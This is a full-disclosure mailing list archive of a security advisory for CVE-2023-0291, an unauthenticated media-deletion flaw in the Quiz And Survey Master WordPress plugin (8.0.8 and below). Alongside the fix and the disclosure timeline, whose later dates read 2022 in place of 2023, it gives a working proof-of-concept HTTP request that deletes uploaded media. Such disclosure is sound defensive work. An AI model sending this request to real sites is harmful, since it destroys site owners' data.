[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] [CVE-2023-0291] Quiz And Survey Master <= 8.0.8 - Unauthenticated Arbitrary Media Deletion
From:       "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date:       2023-02-08 8:11:37
Message-ID: 7CA6DF3F-A4C1-4FCA-8374-9DA4C3B50E82 () rcesecurity ! com
[Download RAW message or body]

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Quiz And Survey Master
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/
Type:           Missing Authentication for Critical Function [CWE-306]
Date found:     2023-01-13
Date published: 2023-02-08
CVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVE:            CVE-2023-0291


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Quiz And Survey Master 8.0.8 and below


4. INTRODUCTION
===============
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used
to create engaging content to drive traffic and increase user engagement.
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated
users which accepts a "media_id" parameter pointing to a any item uploaded through
WordPress' media upload functionality. However, this "media_id" is afterward used
in a forced wp_delete_attachment() call ultimately deleteing the media from the
WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)
uploaded WordPress media files.


6. PROOF OF CONCEPT
===================
The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1


7. SOLUTION
===========
Update to version 8.0.9


8. REPORT TIMELINE
==================
2023-01-13: Discovery of the vulnerability
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291
2023-01-18: Sent initial notification to vendor via contact form
2022-01-18: Vendor response
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability
2022-02-08: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories


--
Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens
Freelancer | Penetration Tester

RCE Security
VAT-ID: DE328576638
Website: www.rcesecurity.com


This e-mail may contain confidential and/or privileged information.
If you are not the intended recipient (or have received this e-mail in
error) please notify the sender immediately and destroy this e-mail.
Any unauthorized copying, disclosure or distribution of the material
in this e-mail is strictly forbidden.


["signature.asc" (signature.asc)]

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEWVym3nC1+ioyX1+TzjvwrNEH1JsFAmPjWS8ACgkQzjvwrNEH
1JsBOBAA0gBBlxVZCSamh25JCJusfJYvZl57nfrQXjtAKFxKz8AAlqJcrA02icwB
jB9TXkNXgqMHapHu65kxxH5LeyG6DgBMGdPlr0Q20ZQYcodlutuiia6oMOsYIlL2
/a40/yr8LGt3TrijmG1M50FxMwS05adVayJImVSluKGzRYsV7vIedO6T+ZX9Wv3W
9RKbC3Q57eB3uxU3r5NqK0lWhjOzTq6dxYmKLDGnCJ8p5hFkWPrzcTb0qpmkSRcg
37PonHp+ltt4cPbbx20+sfmaquOWvybh23Utk55ajz1niUo0MijW5c9KoELKQq4K
sb8AaW2InzgiiZX5gtwpP0r7R0kJF4yxQRa/JEJIDdr5EeeMrDoT6N1C2sedxvwH
JzdwTaI05mKv5nB8XSBWXjYWKr6J13lIw/q0eVU/PkEnok0r5P5rlVxncPEO5vpQ
h/wdkd8OR2xZ6SUU12d3uafM3ufGeQp0GbswgchouGf/Vsr+89HuwswSGhXRgH2x
jcFlbfbnCZEGmM7X/jA8XoSoPuVk4obMaPkQNK3VHfQjylQd3j5aXpfvRH0HODG7
CtkPDJ0WSEenHXrM1smKbhS4BQYbD+aOLlMI2EJXFbxlrcDhDG/VYiTmnTMWfSdZ
gun1M1I6LEWTsfSQxUM0v1mFDzMPjhpuOJKLSO7qZ2nhwNzt6P8=
=6x2W
-----END PGP SIGNATURE-----


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============4223205985663964539==--

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic